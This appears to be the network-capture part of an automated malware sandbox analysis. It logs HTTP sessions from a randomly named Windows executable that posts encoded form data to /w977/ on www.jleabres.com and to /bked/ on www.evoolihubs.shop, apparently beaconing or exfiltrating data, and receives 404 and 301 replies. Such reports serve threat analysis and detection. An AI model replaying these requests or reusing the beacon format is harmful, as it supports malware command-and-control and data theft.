                                              14192.168.2.749719103.168.172.37806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:15.051909924 CEST729OUTPOST /w977/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.jleabres.com/w977/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4e 78 41 4a 75 64 7a 38 71 63 4f 77 36 6f 79 74 6e 59 75 6a 35 61 48 30 6d 36 64 78 67 32 67 67 4e 54 79 7a 76 4a 74 49 6b 43 75 4f 4f 77 55 44 35 42 79 49 6e 52 4f 37 45 58 6e 78 54 5a 55 75 6a 49 79 75 74 38 75 6b 76 5a 46 6f 32 47 32 74 6f 76 30 49 79 69 4b 73 5a 4a 43 47 62 6c 35 42 76 33 46 33 51 79 78 62 35 72 47 36 47 42 45 33 52 6a 33 69 31 36 6e 35 67 47 47 6d 56 64 50 31 71 69 51 59 32 48 57 7a 35 55 52 63 46 6e 34 52 54 66 4d 35 34 32 42 48 4c 55 30 77 77 58 31 51 57 53 76 30 39 74 72 74 61 5a 61 31 50 2b 6f 62 67 52 78 58 72 45 74 65 39 41 4b 35 69 6b 45 68 4f 44 78 78 62 43 39 54 65 38 74 63 67 79 52 73 67 4c 68 32 63 38 6c 65 77 51 35 6c 42 71 2f 79 41 36 68 34 48 77 6f 3d
                                              Data Ascii: 5HE=NxAJudz8qcOw6oytnYuj5aH0m6dxg2ggNTyzvJtIkCuOOwUD5ByInRO7EXnxTZUujIyut8ukvZFo2G2tov0IyiKsZJCGbl5Bv3F3Qyxb5rG6GBE3Rj3i16n5gGGmVdP1qiQY2HWz5URcFn4RTfM542BHLU0wwX1QWSv09trtaZa1P+obgRxXrEte9AK5ikEhODxxbC9Te8tcgyRsgLh2c8lewQ5lBq/yA6h4Hwo=
                                              Jul 21, 2024 13:32:15.734257936 CEST570INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_7a8f4592912729422423db5713491e65
                                              Content-Encoding: br
                                              Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.749720103.168.172.37806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:17.611635923 CEST1742OUTPOST /w977/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.jleabres.com/w977/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4e 78 41 4a 75 64 7a 38 71 63 4f 77 36 6f 79 74 6e 59 75 6a 35 61 48 30 6d 36 64 78 67 32 67 67 4e 54 79 7a 76 4a 74 49 6b 43 57 4f 4e 43 63 44 34 69 4b 49 6d 52 4f 37 4d 33 6e 77 54 5a 55 2f 6a 49 71 71 74 39 53 53 76 62 4e 6f 33 6b 75 74 76 65 30 49 72 79 4b 73 47 35 43 4c 66 6c 35 75 76 30 74 7a 51 79 68 62 35 72 47 36 47 43 73 33 55 43 33 69 7a 36 6e 2b 71 6d 47 55 45 74 50 4a 71 69 49 6d 32 44 4b 4a 35 6b 78 63 46 48 6f 52 41 36 67 35 6e 47 42 46 62 45 30 6f 77 58 35 54 57 53 7a 53 39 74 7a 48 61 65 57 31 4e 62 30 41 6c 56 70 76 31 6d 38 42 79 42 36 44 70 30 59 57 50 44 6c 63 53 69 64 6d 54 66 6b 69 72 45 35 68 71 38 6b 33 49 71 74 67 33 68 39 4f 48 65 4f 34 55 70 70 42 44 33 49 36 6b 73 71 50 4d 4d 73 6f 53 72 42 38 46 66 38 52 67 51 34 47 56 4b 58 5a 68 2f 31 35 33 55 61 53 39 59 48 67 43 6f 50 5a 44 38 69 31 5a 68 57 7a 69 46 51 64 4e 62 4d 4c 56 59 4e 41 2f 47 53 70 6b 48 66 6a 67 78 77 4f 6a 65 2b 6d 65 50 4a 36 41 43 42 33 78 7a 41 48 49 45 6c 38 4d 44 36 7a 4e 43 62 61 69 79 [TRUNCATED]
                                              Data Ascii: 5HE=NxAJudz8qcOw6oytnYuj5aH0m6dxg2ggNTyzvJtIkCWONCcD4iKImRO7M3nwTZU/jIqqt9SSvbNo3kutve0IryKsG5CLfl5uv0tzQyhb5rG6GCs3UC3iz6n+qmGUEtPJqiIm2DKJ5kxcFHoRA6g5nGBFbE0owX5TWSzS9tzHaeW1Nb0AlVpv1m8ByB6Dp0YWPDlcSidmTfkirE5hq8k3Iqtg3h9OHeO4UppBD3I6ksqPMMsoSrB8Ff8RgQ4GVKXZh/153UaS9YHgCoPZD8i1ZhWziFQdNbMLVYNA/GSpkHfjgxwOje+mePJ6ACB3xzAHIEl8MD6zNCbaiyibJkXKqc9BeWw2XiKaS7vBElZ5jZIFLp1gqiNupDhIWHLG3XHUDeNrlfOPurJScuOJSBrg1I6gh+1T4BS+2je3UNmk/+H1Oqi9DjlRXOOKRyYWwxeUxusj+mqw0vJ6nFiQ2uPAKkeaLi/D2NiN1iP8L/uwLorlnr+XfBH8uZp+0ttn7sRSkAvZIcdSrLPS2ooPQQgIWxPw4cSppVJXGbU5fYlqUQCuIQitne4OJx1Jymj8eqmx8KRDiuAUiRTamtYcyhPzJac/xUUeiXBrVblhpFix61d3FzoDnnUIrZwEzRHrNnXilOx5q09w+3Rju2tqODhab9IrWV91irkS9/PqC7uFAj5DOMzHpbTUMcBZpCY9ORAVynVAHWsfMjgiW4wRgL97XOTUQJ0r7NPkkDMxrFlewYodXlsGF3b7XYnQfccdv0+uTl6jPfhYb2mYhbh1ag93L3LrXJjYa31e7NL4pTncyGiHDdi1uAkUt8etpcOzxb+QxrMIeYCPJ4+hL1bHAaOFynUhr6q8OCcm7aMDubB6agLBcNnITmSDfJkkL9jdkLI8VrQRkbL/neBu8/nq3wS6Ktnvmi0WwJjSk+mj4NA+Q9zU7X1b0vAGdzFemN8uZrr7qEnlyfb0Kj2C7LWUWr8qIei4/ulCDsnQJLIiW7bVFuYI/lD/ [TRUNCATED]
                                              Jul 21, 2024 13:32:18.070393085 CEST570INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:18 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_200340ef876e89d18ffe388d34538054
                                              Content-Encoding: br
                                              Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.749721103.168.172.37806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:20.140944958 CEST446OUTGET /w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:21.613616943 CEST796INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:21 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 544
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_044714c003d642aee30573eebe56373c
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.749722188.114.96.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:31.846313953 CEST718OUTPOST /bked/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Origin: http://www.evoolihubs.shop
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.evoolihubs.shop/bked/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 64 42 72 6b 6b 36 34 67 6e 61 5a 36 57 4e 6c 59 4e 71 78 2b 76 56 66 2f 4d 47 6a 66 4b 4c 4a 73 69 57 6a 49 38 57 63 6c 51 36 30 64 30 2b 64 73 31 56 47 71 37 67 4d 43 65 71 38 30 32 44 42 39 62 54 65 58 6b 35 38 74 59 33 68 58 76 70 7a 77 45 31 65 2b 52 56 6c 6d 51 76 49 5a 33 72 34 73 57 37 35 43 72 45 49 41 61 51 2b 44 50 78 73 44 70 72 39 50 70 63 6d 65 72 52 54 59 2f 79 36 2b 54 52 73 36 47 4a 45 51 57 76 2b 44 5a 48 41 76 6c 78 65 47 67 35 65 59 79 6b 48 37 2f 4f 30 52 68 62 4d 79 30 52 47 4a 4b 62 66 4b 48 79 71 69 4e 2b 44 56 36 4d 6f 4b 45 75 31 36 50 7a 41 78 66 69 6a 4c 79 4e 2f 55 48 44 68 32 6c 6d 35 67 6c 51 3d 3d
                                              Data Ascii: 5HE=dBrkk64gnaZ6WNlYNqx+vVf/MGjfKLJsiWjI8WclQ60d0+ds1VGq7gMCeq802DB9bTeXk58tY3hXvpzwE1e+RVlmQvIZ3r4sW75CrEIAaQ+DPxsDpr9PpcmerRTY/y6+TRs6GJEQWv+DZHAvlxeGg5eYykH7/O0RhbMy0RGJKbfKHyqiN+DV6MoKEu16PzAxfijLyN/UHDh2lm5glQ==
                                              Jul 21, 2024 13:32:32.308267117 CEST847INHTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:32 GMT
                                              Location: https://www.evoolihubs.shop/bked/
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0QXELI7Ts8ZSA03ZZcLhIoB0c2st8eHV67NIptXUN%2BAe5%2BUyfo27aBo4S0XTj8np4nDJ9vVJREjzJMv7tae0JkNP1b4BfW5SaNPR7wJDjKdnfjgDRgUMjwZkEWkkzf%2BiyoaSgRMr"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8a6adef59b6d438b-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.749723188.114.96.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:34.415971041 CEST738OUTPOST /bked/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Origin: http://www.evoolihubs.shop
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.evoolihubs.shop/bked/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 64 42 72 6b 6b 36 34 67 6e 61 5a 36 57 74 56 59 49 4e 6c 2b 37 46 66 38 51 32 6a 66 45 72 49 6c 69 57 6e 49 38 58 6f 31 51 4a 51 64 30 66 74 73 30 55 47 71 34 67 4d 43 56 4b 38 39 72 7a 42 6d 62 54 43 70 6b 35 51 74 59 33 31 58 76 6f 44 77 45 45 65 35 58 46 6c 6f 62 50 49 62 71 62 34 73 57 37 35 43 72 45 63 71 61 52 57 44 50 42 63 44 6f 4b 39 49 67 38 6d 66 6a 78 54 59 75 43 37 33 54 52 73 59 47 49 6f 70 57 74 32 44 5a 47 77 76 6c 67 66 51 31 70 65 65 74 30 47 36 2f 2f 63 66 35 70 41 52 38 6a 4c 55 47 72 76 79 4c 6b 33 41 58 63 50 35 6b 64 51 78 41 73 52 4d 59 56 64 45 64 6a 6e 54 2f 76 4c 31 59 30 45 63 6f 30 59 6b 7a 70 5a 77 47 4f 72 62 31 6f 47 55 77 66 6a 33 49 42 6d 30 7a 33 41 3d
                                              Data Ascii: 5HE=dBrkk64gnaZ6WtVYINl+7Ff8Q2jfErIliWnI8Xo1QJQd0fts0UGq4gMCVK89rzBmbTCpk5QtY31XvoDwEEe5XFlobPIbqb4sW75CrEcqaRWDPBcDoK9Ig8mfjxTYuC73TRsYGIopWt2DZGwvlgfQ1peet0G6//cf5pAR8jLUGrvyLk3AXcP5kdQxAsRMYVdEdjnT/vL1Y0Eco0YkzpZwGOrb1oGUwfj3IBm0z3A=
                                              Jul 21, 2024 13:32:34.870908976 CEST847INHTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:34 GMT
                                              Location: https://www.evoolihubs.shop/bked/
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqnGd8aUNrCgC7B%2FzMsFAoSUX5Q3HjH%2BV%2FlICAqd0Z44LqVeAL454q5dPoalKacRGTJWyCcdhiCe0YHLNeBERhAiqkkLTYmqUhCqbTCd29BlAVfXiSYmGZZaOf7SOm4pFHQSeWDM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8a6adf059a2178e8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.749724188.114.96.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:36.952569962 CEST1751OUTPOST /bked/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Origin: http://www.evoolihubs.shop
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.evoolihubs.shop/bked/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 64 42 72 6b 6b 36 34 67 6e 61 5a 36 57 74 56 59 49 4e 6c 2b 37 46 66 38 51 32 6a 66 45 72 49 6c 69 57 6e 49 38 58 6f 31 51 4a 59 64 30 4d 31 73 31 7a 61 71 35 67 4d 43 59 71 38 77 72 7a 41 6b 62 54 61 74 6b 35 4d 62 59 78 78 58 75 4f 2f 77 43 77 79 35 65 46 6c 6f 55 76 49 61 33 72 34 35 57 37 70 47 72 48 6b 71 61 52 57 44 50 43 45 44 76 62 39 49 73 63 6d 65 72 52 54 55 2f 79 37 66 54 52 30 69 47 49 73 6d 58 63 57 44 5a 6c 49 76 6d 53 33 51 30 4a 65 63 75 30 48 70 2f 2f 42 64 35 70 4d 64 38 6d 32 7a 47 73 44 79 4a 31 4b 67 50 65 44 64 36 74 51 43 66 61 5a 63 62 48 74 45 63 6a 37 35 77 49 76 6d 61 56 55 6b 71 33 4a 74 31 63 6f 4a 52 4e 6e 2b 37 34 6a 47 77 76 79 41 59 53 6d 65 6e 67 4f 4b 6f 59 6d 51 31 30 54 32 50 4e 32 6f 65 76 54 4d 46 6a 4b 55 5a 33 4b 2b 55 56 39 33 4a 43 36 62 78 6b 33 4d 70 37 76 56 2f 56 62 31 73 59 48 31 71 70 77 47 58 54 64 4a 37 56 46 77 2b 78 4b 49 5a 6e 6a 6f 7a 34 4c 35 37 78 67 70 46 68 41 43 59 71 66 71 43 6e 33 75 4e 72 49 75 75 7a 73 65 62 79 67 75 4b 39 [TRUNCATED]
                                              Data Ascii: 5HE=dBrkk64gnaZ6WtVYINl+7Ff8Q2jfErIliWnI8Xo1QJYd0M1s1zaq5gMCYq8wrzAkbTatk5MbYxxXuO/wCwy5eFloUvIa3r45W7pGrHkqaRWDPCEDvb9IscmerRTU/y7fTR0iGIsmXcWDZlIvmS3Q0Jecu0Hp//Bd5pMd8m2zGsDyJ1KgPeDd6tQCfaZcbHtEcj75wIvmaVUkq3Jt1coJRNn+74jGwvyAYSmengOKoYmQ10T2PN2oevTMFjKUZ3K+UV93JC6bxk3Mp7vV/Vb1sYH1qpwGXTdJ7VFw+xKIZnjoz4L57xgpFhACYqfqCn3uNrIuuzsebyguK9QZFuv12ZTakvEx9TTM+cDAcSO96doGz+IRBzPbzSjy//LU9QsOJf2mkvCUUMpjYM3X94C+D5sFA9dyfPMkxYbOJwpGm0LSDm546hfSXHPBf3A5BVCEDxqOH1RMwaUORwsiA/OqbhG/Ye0jjfYr1YDuFyoHUIbnkSQegitcldH/4HODM2NX9CFMb+hPXEDBngbjknGGDR14VqEfON2Q5oPBqbXPCIXcln1rB3u75khE67MK/3XIpcj29tRew4rhLTV7JbKCm/YxcJj8vX/AY1Iewm9CxAfHkaaMpK3cDbYqWFrFSA+H3HPDwW6R6jcDZMvuOzY/K6w6HwiUOkZ4yuGvUpCvZD8ZQuF8XC4CHVC924nizjBYMfgjHIBpe1hnvIFIm1C9ZGneEOuJ14SQdVgddHQxjdPxonYI61PuXm+Dbo1dFzAyLCpPReOfc6d05zz0N3jvRC5cgVywG0fRurJOvk+KrkleIT3xujocbcErGzjiMLJUN/zk2vIMTxq+VeVNXezsIamwEeNlQfYiBvuhEcidMQoz5u2FoLMahcmzIiAHPwTQt5pIk21IBEnwosUD0IIXREDP1OObgUSxEoV4UQbRLcZ/cofcO7HYWyYdjzG39HhJsRau+XchxnugjNn0YuvzEVnvrsvwY3LymBnKsdPasL4Grbf4 [TRUNCATED]
                                              Jul 21, 2024 13:32:37.409792900 CEST845INHTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:37 GMT
                                              Location: https://www.evoolihubs.shop/bked/
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVF2lr%2BeZZZGROvLq7W%2BQW9X64oFacsfLsD7H64IUz6sOq1nW86NPTXt0kJKUMRptUeROUiZ0Ig8VZFWTCbmGYAQTHV7RhTjPr4vRDl24qZjJHXC3dIBD9rASFaApQziETbfsuAf"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8a6adf157fcc4261-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
